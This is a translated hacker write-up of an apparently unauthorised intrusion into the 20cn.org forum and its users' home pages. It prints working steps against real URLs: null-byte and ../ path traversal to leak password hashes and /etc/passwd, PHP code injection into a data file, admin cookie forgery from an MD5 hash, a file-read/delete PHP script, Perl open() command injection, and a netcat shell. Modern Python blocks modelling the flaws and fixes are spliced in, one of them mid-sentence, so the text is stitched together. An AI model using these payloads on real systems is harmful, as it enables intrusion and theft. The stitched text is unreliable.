| = ------- Reproducing the full process of a friendly intrusion into 20cn.org ------- = |
| = --------- = [pskey & envymask] = --------- = |
| = --------------------------------------- = |
Author: Envymask <130@21cn.com>
Site:
http://envymask.3322.org
Ph4nt0m (Phantom Brigade):
http://www.ph4nt0m.net/bbs/
Author: [C4ST] PsKey
Site:
http://www.isgrey.com
Group Home:
http://c4st.51.net
Group Forum:
http://analysisist.tocare.net
>>> This piece is dedicated to caojing & taozi <<<
In the martial arts world, the sword that strikes from the greatest distance holds the advantage. Today firewalls are widely deployed on networks to enforce access control policies. As CGI security has quietly come to the fore, script attacks now travel under the firewall's own "identity", passing through it as ordinary web traffic, and the real danger hides behind seemingly simple scripts. This article reproduces, through script defects, the whole process of an intrusion into 20CN, in the hope of offering a little fun and some insight.
20cn.org (20CN Network Security Group) is a fairly well-known hacker/security site in China, and we began a security test of it.
Without any outside help, we started directly from the web. As far as we know, the 20CN programs were written by the site's webmaster, NetDemon. Considering code size and complexity, we focused on the site's forum. We are in the habit of looking at user information first, because the username and the user password are always kept together, and that is where we are most likely to get what we want. Submit the following URL to view NetDemon's user information:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=netdemon
Returns the user information normally.
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=./netdemon
Error message: there is a problem with the forum system!
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=netdemon%00
The "number of posts" field of the returned user information contained an inexplicable string, while the rest of the information was intact.
Something seems off here. What is this string? We logged in with an ID we had registered earlier and noticed that the query string of every URL carried a variable named key whose value looked similar to the string above. Is this a password? After logging in several times we observed that the key value was different each time, so the key is apparently used to identify us within the forum and is probably related to the user's password... Setting the key aside for the moment, we continued experimenting with our own ID and submitted this URL:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=envymask
The same kind of string came out again. This time we boldly guessed that the string was our own password, and on checking we found that it was indeed our password under standard DES encryption. Our guess was right: the string is the encrypted user password. But why does the password leak? Our next hypothesis was this. There must be two files per user in the user data directory: one that holds the password, and one that does not and only holds general information such as e-mail address and birthday. The two files are probably named username and username.xxx (with some suffix). userinfo.pl does not filter the user parameter before passing it to open, or at least does not filter \0 (%00), so when it tries to open username.xxx it actually opens username, because at the C level the string ends at the null byte and username.xxx is not username. The code that opens the file is probably written as open(F, "$path/$username.xxx"); with user=abcdef%00 this is equivalent to open(F, "$path/abcdef"), and that is the file that holds the user password. Some of the user-information variables are then filled from the wrong file and echoed back to the user, which is how the password came out.

Nice... we immediately obtained the encrypted password of the webmaster NetDemon, but we put any thought of brute-forcing it aside, since breaking out of this directory was more tempting. So we submitted:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../../../etc/passwd%00
The password file came out, so there was something here. Continuing:
http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl?user=../../../../../../etc/
Limited by the page output format, we could only see some of the files and directories in /etc. We then tried opening some files, but only small fragments came back, which was almost useless. After viewing many files with no new breakthrough, we were somewhat disappointed. So we temporarily set this bug aside and looked for other file-handling flaws, going through CGI programs such as display.pl and show.pl, but found nowhere to break in, since those scripts do some filtering. This road seemed to go no further.
Since CGI would not yield, we needed another line of thought. Using userinfo.pl to view fragments of files and directories, we first searched for Apache's configuration file and finally found httpd.conf in /usr/local/etc/apache, but we could only see a few lines of it, which were of no use at all. Then we went to the /home directory and looked around. There were many users, more than we had seen in /etc/passwd, because when viewing /etc/passwd we could only see a few lines. Entering the directory of a user named tomy, we saw a public_html directory, so the system apparently gives each user space to publish a personal home page. Interesting: in the browser we could access
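The two tricks used against userinfo.pl, the null byte that truncates the filename at the C boundary and the ../ segments that walk out of the data directory, are modelled below. This is an added example, not 20CN's code: the data directory path, the ".info" suffix and the query strings are constructed for the illustration, since the page only says the second file is "username.xxx". naive_open_target() shows what open(2) actually receives when a script concatenates the raw parameter; safe_open_target() is the check the script should have done.

```python
import os
import re
from urllib.parse import parse_qs

# Constructed values for this example; the forum's real data directory and
# the exact suffix of the "username.xxx" file are not given on the page.
USER_DIR = "/var/www/club/users"
INFO_SUFFIX = ".info"


def user_from_query(query_string):
    """Decode the 'user' parameter the way a CGI library does: %00 becomes a
    real NUL byte and %2F a slash, so the script receives the raw bytes."""
    return parse_qs(query_string, keep_blank_values=True).get("user", [""])[0]


def naive_open_target(username, user_dir=USER_DIR, suffix=INFO_SUFFIX):
    """What open(2) sees when a script does open(F, "$dir/$user$suffix")
    with no validation: the C string stops at the first NUL byte, so a
    trailing %00 drops the suffix, and the kernel resolves '..', so ../
    segments leave the base directory."""
    raw = f"{user_dir}/{username}{suffix}"
    c_string = raw.split("\x00", 1)[0]
    return os.path.normpath(c_string)


# Whitelist for the parameter: a plain identifier, nothing else.
USERNAME_RE = re.compile(r"\A[A-Za-z0-9_]{1,32}\Z")


def safe_open_target(username, user_dir=USER_DIR, suffix=INFO_SUFFIX):
    """Hardened lookup: reject anything that is not a plain identifier,
    build the path, and still confirm the result stays under user_dir.
    (A real deployment should also os.path.realpath() both sides so a
    symlink inside user_dir cannot point elsewhere.)"""
    if not USERNAME_RE.match(username):
        raise ValueError(f"rejected user parameter: {username!r}")
    base = os.path.normpath(user_dir)
    target = os.path.normpath(os.path.join(base, username + suffix))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes user directory")
    return target


def accepts(username):
    """True if safe_open_target() would serve this parameter."""
    try:
        safe_open_target(username)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed query strings mirroring the ones used on the page.
    for qs in ("user=netdemon", "user=netdemon%00",
               "user=../../../../../../etc/passwd%00"):
        u = user_from_query(qs)
        print(f"{qs:45} naive -> {naive_open_target(u):35} accepted={accepts(u)}")
```

The naive function is the bug, not a fix: it exists only to show that `netdemon%00` reaches the file `netdemon` and that enough `../` segments reach `/etc/passwd`. The fix is the whitelist plus the containment check; a Perl script of that era would additionally run with `-T` (taint mode) so that an unvalidated CGI parameter cannot reach open() at all.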
http://www.20cn.org/~tomy
So we saw this guy's personal page and looked at what was inside. By chance we noticed a /phpmyadmin directory; we visited it immediately and found no password verification. We were now effectively holding a MySQL user, so we tried writing something into the database through phpMyAdmin, namely a small phpshell, and then exporting it into the home page directory. After a long effort we got it written into the database, but when writing out to disk we found we had no permission. A depressing setback... We continued looking through several users' directories; most had little in them, only some static pages. After some effort we finally found a big fish: the user shuaishuai. Going to his home page, ha, we discovered this:
http://www.20cn.org/~shuaishuai/show.php?filename=20030329185337.txt
Good guy, let's see whether it allows directory traversal:
http://www.20cn.org/~shuaishuai/show.php?filename=../../../../../../etc/passwd
It returned this:
Warning: is_file() [function.is-file]: SAFE MODE Restriction in effect. The script whose uid is 1007 is not allowed to access ../../../../../../etc/passwd owned by uid 0 in /usr/home/shuaishuai/public_html/show.php on line 77
Failure, but not because traversal is blocked, only because of permissions. Well, let's see whether we can view a file we do have permission for:
http://www.20cn.org/~shuaishuai/show.php?filename=../../../../../../home/shuaishuai/public_html/post.php
Success: we saw the source code of post.php. Great, we'll use this as our breakthrough. But it only lets us view shuaishuai's own files, not others', and viewing files alone is not enough; we want a shell, which seemed harder. Looking further, shuaishuai's home page actually had quite a lot on it, including a message board, X-Pad. The message board lets users register, and each registered user gets a configuration file under the /user directory that stores some of the user's information. After reading the source of the registration code we found that it does no filtering, so at least one variable lets us insert our own code. So we registered a user and put our code in the HOMEPAGE field, making our user profile look like this:
$user_psw = "1234";
$user_qq = "";
$user_email = "";
$user_homepage = "http:///";copy($a,$b);unlink($a);#";
$user_avatar = "styles/avatars/blank.gif";
$user_bbsmode = "0";
?>
This PHP file should let us copy a file into a directory where we have permission and delete files we have permission to delete. But when executed it did not work. Why? Look at the line $user_homepage = "http:///";copy($a,$b);unlink($a);#"; The double quote we submitted automatically gets a backslash inserted in front of it, so in the PHP statement it is not the closing quote of the string but part of the variable's value: $user_homepage becomes the whole string "http:///\";copy($a,$b);unlink($a);#" and our code never runs. Evidently magic_quotes_gpc = On, so this attempt failed.
Undiscouraged, we kept patiently looking for something usable, and soon found it.
http://www.20cn.org/~shuaishuai/down_sys/ is a download system. We listed the directory and viewed the download system's source files (since we had permission to view files in this directory). Under down_sys/data/user/ we found the administrator's user file, which contains a password, but the headache was that the administrator password is MD5-hashed. We did not give up on this hashed password easily; we went straight to the administrator verification code. In /down_sys/admin/global.php we found that its verification includes a cookie check; the relevant code is as follows:
......
if (isset($password)) $password = md5($password);
if (empty($username)) $username = $HTTP_COOKIE_VARS['bymid'];
if (empty($password)) $password = $HTTP_COOKIE_VARS['bympwd'];
if (!checkpass($username, $password)) {
    admintitle();
    adminlogin();
    exit;
}
......
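The weakness in that check is that the cookie carries md5(password), the same value stored in the user file, so the stored hash is itself the login credential: anyone who can read data/user/ (as show.php allowed) or sniff one request can log in without ever knowing the password. The block below is an added example, not the download system's code. checkpass_md5_cookie() models the page's logic on a constructed user record; the session-token functions show the alternative, a server-issued cookie bound to a secret the client never sees, with a hypothetical SERVER_SECRET and an expiry.

```python
import hashlib
import hmac

# Constructed stand-in for the download system's data/user/ record: the
# administrator's stored credential is md5(password), as on the page.
USER_DB = {"adminuser": hashlib.md5(b"example-password").hexdigest()}


def checkpass_md5_cookie(username, cookie_pwd, user_db=USER_DB):
    """Model of global.php: the 'bympwd' cookie carrying md5(password) is
    compared directly with the stored hash, so the hash is the password."""
    stored = user_db.get(username)
    return stored is not None and hmac.compare_digest(stored, cookie_pwd)


# Hardened replacement (assumed design, not the project's own): the cookie
# is an HMAC-signed session token, so knowing the stored hash forges nothing.
SERVER_SECRET = b"assumed-server-side-secret-never-sent-to-clients"


def make_session_cookie(username, expires_at, secret=SERVER_SECRET):
    """Issue username|expiry|HMAC after a successful password login."""
    if "|" in username:
        raise ValueError("username may not contain the field separator")
    msg = f"{username}|{expires_at}".encode()
    tag = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    return f"{username}|{expires_at}|{tag}"


def verify_session_cookie(cookie, now, secret=SERVER_SECRET):
    """Return the username if the token is intact and unexpired, else None.
    The tag is recomputed server-side and compared in constant time."""
    parts = cookie.split("|")
    if len(parts) != 3 or not parts[1].isdigit():
        return None
    username, expires_at, tag = parts
    msg = f"{username}|{expires_at}".encode()
    expected = hmac.new(secret, msg, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    if now >= int(expires_at):
        return None
    return username


if __name__ == "__main__":
    leaked_hash = USER_DB["adminuser"]          # read from the user file
    print("md5-cookie forgery works:", checkpass_md5_cookie("adminuser", leaked_hash))
    forged = f"adminuser|9999999999|{leaked_hash}"
    print("same hash as a session token:", verify_session_cookie(forged, now=1))
    real = make_session_cookie("adminuser", expires_at=2000)
    print("server-issued token:", verify_session_cookie(real, now=1000))
```

With the token design the stored password hash should also be salted and slow (bcrypt or similar) so that reading the user file does not hand over a crackable MD5; the cookie itself should be set HttpOnly and, where the site has TLS, Secure, which the 2003 site did not.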
This allows cookie spoofing. We used a rather clumsy method here:
First disconnect from the network, change our own IP address to 20cn.org's IP, then in %systemroot%\system32\drivers\etc\hosts point www.20cn.org at that IP. The purpose of this step is that, while we are offline, www.20cn.org resolves to our own machine. Finally, in our local IIS, create a virtual directory /~shuaishuai/down_sys/admin/ and write an ASP file there that sets the cookies to the administrator's username and password hash. The ASP file is:
<%
Response.Cookies("bymid") = "adminuser"
Response.Cookies("bympwd") = "596a96cc7bf91abcd896f33c44aedc8a"
%>
Then access this ASP file:
http://www.20cn.org/~shuaishuai/down_sys/admin/cookie.asp
Leave this browser window open, change the IP back to the original 192.168.0.1 and reconnect, then from the same window request
http://www.20cn.org/~shuaishuai/down_sys/admin/admin.php
The management interface appeared; verification passed. Then we would upload our file... but after searching for a long time we found there is no file upload function at all. Damn, it is a half-finished product. Completely disappointed? No, we still had confidence. We looked at the other files to see where we could make a move and found class.php, which stores the software category information for the download system; its content looks like this:
5|Security Tools|1028372222
8|Wine Tools|1034038173
7|Other Software|1034202097
....
We tried writing something into it: on the management page we added a new top-level category whose name is <?php copy($a,$b);unlink($a);?>, after which class.php looked like this:
5|Security Tools|1028372222
8|Wine Tools|1034038173
7|Other Software|1034202097
9|<?php copy($a,$b);unlink($a);?>|1054035604
This PHP file lets us copy a file into a directory we have permission to write and delete files we have permission to delete. This time the payload contains no quotes, so magic_quotes_gpc has nothing to escape. So we wrote a form locally, uploaded a phpshell and then accessed:
Http://www.20cn.org/~shuaishuai/down_sys/data/sh.php
Good, it returned the phpshell interface... After rejoicing we found that this phpshell could not execute commands: the site's PHP has safe_mode turned on, which restricts us from running commands. Still, we had a big breakthrough: we could upload files to the server. Next we wrote many small test scripts; the program below views the directories and files our privileges allow:
<?php
$c = $HTTP_GET_VARS["c"];   // command: file, dir or del
$f = $HTTP_GET_VARS["f"];   // target path
if ($c == "file") {
    readfile($f);           // dump the file to the browser
}
if ($c == "dir") {
    $h = opendir($f);
    while ($file = readdir($h)) {
        echo "$file\n";
    }
}
if ($c == "del") {
    unlink($f);
}
?>
After many attempts we found no new breakthrough on the PHP side, but we could use the PHP program above to read the complete source of the scripts in www.20cn.org/cgi-bin/club/scripts/, so we decided to return to the starting point and look at the CGI again. Since we had no permission to write files in the directory of the executable CGI programs, creating a new CGI program was unrealistic, so we decided to inject commands through the existing .pl programs, naturally targeting Perl's open function. We started searching for open calls but found none in many .pl files; instead we saw many readfile() calls. Perl has no such built-in, so why so many readfile() calls here? It must be a function they defined themselves. Each .pl file has use club; at the top, so there is a module here, and in it we found the open call:
sub readkey {
    my ($file) = @_;
    unless (open(FH, "$file")) {
        errmsg("Sorry! You have timed out, please log in again");
        exit;
    }
    unless (flock(FH, LOCK_SH)) {
        errmsg("Can't lock file: $file");
    }
    my $data = <FH>;
    close(FH);
    return $data;
}
This is the custom readfile-style function, confirming our conjecture, and it contains an open call that meets our requirements: the two-argument form open(FH, "$file"), in which Perl interprets mode characters and a trailing "|" inside the string itself. We then searched for which file calls this function and quickly found the call in change_pw.pl. This program is used to change the user's password, and unfortunately it calls readkey() before checking whether the user's old password is correct:
my $key_info = readkey("$key_dir/$key");
So we submitted:
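Why a value ending in "|" turns readkey() into command execution is a property of Perl's two-argument open(): the single string is parsed for a mode, and a trailing pipe means "run this as a shell command and read its output". The model below is an added example written from the documented rules in perlfunc/perlopentut, not Perl's own source or 20CN's code; KEY_DIR is a constructed stand-in for the page's $key_dir, whose value the page does not give.

```python
import re

# Constructed key directory; the page names the variable $key_dir but not its value.
KEY_DIR = "/var/www/club/keys"


def perl_two_arg_open(spec):
    """Classify how Perl's two-argument open(FH, spec) reads its string.
    Returns (mode, target) where target is a filename or a shell command.
    Rules modelled: leading whitespace skipped; a leading '|' pipes output
    to a command; '+>>', '+>', '+<', '>>', '>', '<' select a file mode; with
    no prefix the name is read, unless it ends in '|', which runs it."""
    s = spec.lstrip()
    if s.startswith("|"):
        cmd = s[1:].strip()
        if cmd.endswith("|"):
            raise ValueError("Can't do bidirectional pipe")
        return ("pipe_to_command", cmd)
    for prefix, mode in (("+>>", "read_append"), ("+>", "read_write_truncate"),
                         ("+<", "read_write"), (">>", "append"),
                         (">", "write"), ("<", "read")):
        if s.startswith(prefix):
            return (mode, s[len(prefix):].strip())
    s = s.rstrip()
    if s.endswith("|"):
        return ("pipe_from_command", s[:-1].rstrip())
    return ("read", s)


def readkey_open_spec(key, key_dir=KEY_DIR):
    """The string change_pw.pl hands to readkey(): "$key_dir/$key". Because
    $key follows a directory prefix, an attacker cannot inject a leading
    mode character, only traversal and the trailing pipe."""
    return f"{key_dir}/{key}"


KEY_RE = re.compile(r"\A[A-Za-z0-9]+\Z")


def key_is_safe(key):
    """Whitelist the session key before it reaches open(): the page's keys
    are opaque tokens, so letters and digits only."""
    return KEY_RE.match(key) is not None


if __name__ == "__main__":
    # Constructed inputs: a benign key and the payload shape used on the page.
    for key in ("a1b2c3d4", "../../bin/ls > bbb |"):
        print(f"{key!r:28} safe={key_is_safe(key)!s:5} ->",
              perl_two_arg_open(readkey_open_spec(key)))
```

The Perl-side fix is the three-argument form, `open(my $fh, '<', "$key_dir/$key")`, which takes the string as a literal filename regardless of its content, combined with the whitelist above; with two-argument open no amount of escaping is safe, because the parsing happens inside open() itself.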
http://www.20cn.org/cgi-bin/club/scripts/change_pw.pl?passwd0=1&passwd1=22&passwd2=222222&key=../../bin/ls%20>bbb%20|
Then view the result:
http://www.20cn.org/cgi-bin/club/scripts/bbb
Yeah! Executed successfully... the output is exactly what we expected. This is really wonderful: we can use this to execute commands, which is equivalent to having a shell. But it is inconvenient after all, since we cannot see our results in real time. So we uploaded a source file, compiled it, ran it, and then connected to the port it listens on:
D:\Temp>nc -vv www.20cn.org 12345
www.20cn.org [211.161.57.29] 12345 (?) open
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD ns8.20cn.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr 2 07:01:40 CST 2003 root@ns8.20cn.com:/usr/obj/usr/src/sys/20cn i386
Oh, it is FreeBSD 4.8-RELEASE, a very recent version, which makes privilege escalation harder. We searched for a working local exploit for a long time without finding one, and the privilege escalation failed. At this point our intrusion was basically over. Although we did not get root, we at least obtained the web server's privileges; for CGI security enthusiasts like us, that should count as completing our own part of the job :-). Afterwards we promptly contacted the webmaster to alert him to the security risk, but he did not ask us for details; he fixed the vulnerabilities by analysing the logs.